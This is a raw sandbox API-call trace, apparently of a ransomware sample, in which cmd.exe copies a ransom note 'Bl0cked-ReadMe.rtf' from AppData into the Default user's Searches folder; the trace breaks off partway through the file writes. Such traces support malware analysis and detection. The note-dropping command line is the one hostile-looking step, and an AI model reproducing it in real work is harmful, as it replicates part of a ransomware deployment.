filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32254 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32255 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 32256 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32257 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32258 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32259 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32260 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32261 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32262 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 32263 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 32264 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Thread: id = 753 os_tid = 0xa70 [0216.600] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfd6c | out: lpSystemTimeAsFileTime=0x1cfd6c*(dwLowDateTime=0xb5e8b320, dwHighDateTime=0x1d440a9)) [0216.600] GetCurrentProcessId () returned 0xbd8 [0216.600] GetCurrentThreadId () returned 0xa70 [0216.600] GetTickCount () returned 0x3c966 [0216.600] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfd64 | out: lpPerformanceCount=0x1cfd64*=27338892654) returned 1 [0216.600] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.600] __set_app_type (_Type=0x1) [0216.600] __p__fmode () returned 0x76b331f4 [0216.600] __p__commode () returned 0x76b331fc [0216.600] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.601] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.601] GetCurrentThreadId () returned 0xa70 [0216.601] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa70) returned 0x38 [0216.601] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.601] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.601] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.601] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfcfc | out: phkResult=0x1cfcfc*=0x0) returned 0x2 [0216.601] VirtualQuery (in: lpAddress=0x1cfd33, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.601] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfccc, dwLength=0x1c | out: lpBuffer=0x1cfccc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0216.601] GetConsoleOutputCP () returned 0x1b5 [0216.601] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.601] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.601] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.601] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.602] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.602] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.602] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.602] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.602] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.602] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.602] GetEnvironmentStringsW () returned 0x290168* [0216.602] FreeEnvironmentStringsW (penv=0x290168) returned 1 [0216.603] GetEnvironmentStringsW () returned 0x290168* [0216.603] FreeEnvironmentStringsW (penv=0x290168) returned 1 [0216.603] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec6c | out: phkResult=0x1cec6c*=0x40) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x90, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x0, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegCloseKey (hKey=0x40) returned 0x0 [0216.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec6c | out: phkResult=0x1cec6c*=0x40) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x0, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegCloseKey (hKey=0x40) returned 0x0 [0216.603] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.603] srand (_Seed=0x5b8863b2) [0216.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" [0216.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" [0216.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.604] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2918c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.604] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.604] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.604] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.604] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.604] GetEnvironmentStringsW () returned 0x2922b8* [0216.604] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0216.604] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.604] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.604] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.605] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.605] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.605] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.605] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.605] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.605] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.605] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.605] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.605] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa38, lpFilePart=0x1cfa34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfa34*="Desktop") returned 0x18 [0216.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.606] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.606] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.606] GetEnvironmentStringsW () returned 0x292ad8* [0216.606] FreeEnvironmentStringsW (penv=0x292ad8) returned 1 [0216.606] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.606] GetConsoleOutputCP () returned 0x1b5 [0216.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.606] GetUserDefaultLCID () returned 0x409 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="0") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="0") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="1") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 [0216.607] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.608] GetConsoleTitleW (in: lpConsoleTitle=0x2808d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.609] _wcsicmp (_String1="type", _String2=")") returned 75 [0216.609] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0216.609] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0216.609] _wcsicmp (_String1="IF", _String2="type") returned -11 [0216.609] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0216.609] _wcsicmp (_String1="REM", _String2="type") returned -2 [0216.609] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] GetFileType (hFile=0x7) returned 0x2 [0216.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0216.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cfa70 | out: lpMode=0x1cfa70) returned 1 [0216.613] _dup (_FileHandle=1) returned 3 [0216.613] _close (_FileHandle=1) returned 0 [0216.613] _wcsicmp (_String1="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0216.613] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cfa40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0216.614] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0216.614] GetConsoleTitleW (in: lpConsoleTitle=0x1cf870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.615] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0216.615] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0216.615] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0216.615] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0216.616] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.616] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf3d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf3d4) returned 0x280e50 [0216.616] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0216.616] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0216.616] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0216.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ce2e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0216.617] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] GetFileType (hFile=0x54) returned 0x1 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce338 | out: lpFileSizeHigh=0x1ce338*=0x0) returned 0x1632 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] GetFileType (hFile=0x4c) returned 0x1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] GetFileType (hFile=0x4c) returned 0x1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.620] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle 